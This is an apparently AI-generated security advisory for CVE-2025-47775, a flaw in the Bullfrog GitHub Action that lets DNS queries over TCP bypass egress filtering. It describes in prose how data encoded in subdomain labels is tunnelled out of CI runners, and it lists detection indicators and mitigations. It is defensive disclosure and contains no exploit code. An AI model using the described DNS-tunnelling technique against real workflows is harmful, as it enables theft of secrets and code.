CVE-2025-47775 Overview
CVE-2025-47775 affects Bullfrog, a GitHub Action designed to block unauthorized outbound traffic in GitHub workflows. The flaw allows attackers to bypass the egress sandbox by routing DNS queries over TCP, enabling data exfiltration from workflow runners. Versions prior to 0.8.4 fail to filter TCP-based DNS traffic, breaking the intended blocking behavior. The maintainers released v0.8.4 to address the issue.
The vulnerability is tracked under [CWE-201: Insertion of Sensitive Information Into Sent Data] and is documented in GitHub Security Advisory GHSA-m32f-fjw2-37v3.
Critical Impact
Attackers can bypass Bullfrog's egress filtering and exfiltrate secrets, source code, or build artifacts from GitHub Actions workflows using TCP-based DNS tunneling.
Affected Products
- Bullfrogsec Bullfrog GitHub Action prior to version 0.8.4
- GitHub workflows relying on Bullfrog for outbound traffic restriction
- CI/CD pipelines using Bullfrog as a sandboxing control
Discovery Timeline
- 2025-05-14 - CVE-2025-47775 published to NVD
- 2025-07-11 - Last updated in NVD database
Technical Details for CVE-2025-47775
Vulnerability Analysis
Bullfrog operates as a GitHub Action that enforces egress filtering on workflow runners by intercepting and inspecting outbound network traffic. The action is intended to prevent unauthorized data exfiltration and command-and-control communication from compromised builds.
The vulnerability stems from incomplete protocol coverage in the filtering logic. When DNS queries are issued over TCP rather than the default UDP transport, Bullfrog fails to apply its blocking rules. Attackers who gain code execution inside a workflow can route DNS traffic over TCP to bypass the sandbox and exfiltrate data to attacker-controlled name servers.
This class of bypass undermines the core security guarantee of the tool. Workflows that depend on Bullfrog to contain malicious dependencies or compromised actions remain exposed to DNS tunneling techniques until upgraded.
Root Cause
The root cause is a missing enforcement path for TCP DNS traffic in the egress filtering implementation. The filtering rules covered UDP DNS but did not extend equivalent controls to TCP port 53, leaving an unmonitored channel for outbound queries.
Attack Vector
Exploitation requires the attacker to execute code within a Bullfrog-protected workflow, typically through a malicious dependency, compromised action, or untrusted pull request. Once executing, the attacker issues DNS queries over TCP to an attacker-controlled authoritative server. Sensitive data is encoded into subdomain labels and transmitted as part of DNS lookups, evading the egress block.
No authentication or user interaction with the GitHub workflow is required beyond triggering the vulnerable build. See the patch commit for the corrective changes.
Detection Methods for CVE-2025-47775
Indicators of Compromise
- Outbound TCP connections to port 53 originating from GitHub Actions runners
- High-volume or unusually long DNS queries with encoded subdomain labels
- DNS lookups targeting domains not present in the workflow's expected allowlist
- Bullfrog action versions earlier than 0.8.4 referenced in workflow YAML files
Detection Strategies
- Audit repository workflow definitions for bullfrogsec/bullfrog pinned to versions below 0.8.4
- Inspect runner egress logs for TCP/53 traffic, which is uncommon in normal CI workloads
- Correlate DNS query patterns against known tunneling signatures such as long base32 or base64 labels
Monitoring Recommendations
- Enable network flow logging on self-hosted runners to capture protocol and destination metadata
- Forward DNS resolver logs to a centralized analytics platform for anomaly detection
- Set alerts on outbound connections from CI/CD infrastructure to non-allowlisted resolvers
How to Mitigate CVE-2025-47775
Immediate Actions Required
- Upgrade the Bullfrog GitHub Action to version 0.8.4 or later in all workflow files
- Rotate any secrets accessible to workflows that ran with affected Bullfrog versions
- Review recent workflow runs for evidence of unexpected TCP/53 outbound traffic
Patch Information
The issue is fixed in Bullfrog v0.8.4. The corrective changes are tracked in the GitHub commit ae7744a and released through GitHub Release v0.8.4. Pin workflows to the patched version or later to restore egress enforcement.
Workarounds
- Block outbound TCP port 53 at the network or runner firewall level for CI/CD environments
- Restrict workflows to a minimal DNS allowlist enforced outside the Bullfrog action
- Use self-hosted runners with strict egress controls until upgrades are completed
# Configuration example: update Bullfrog reference in .github/workflows/*.yml
- name: Enable egress filtering
uses: bullfrogsec/bullfrog@v0.8.4
with:
egress-policy: block
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
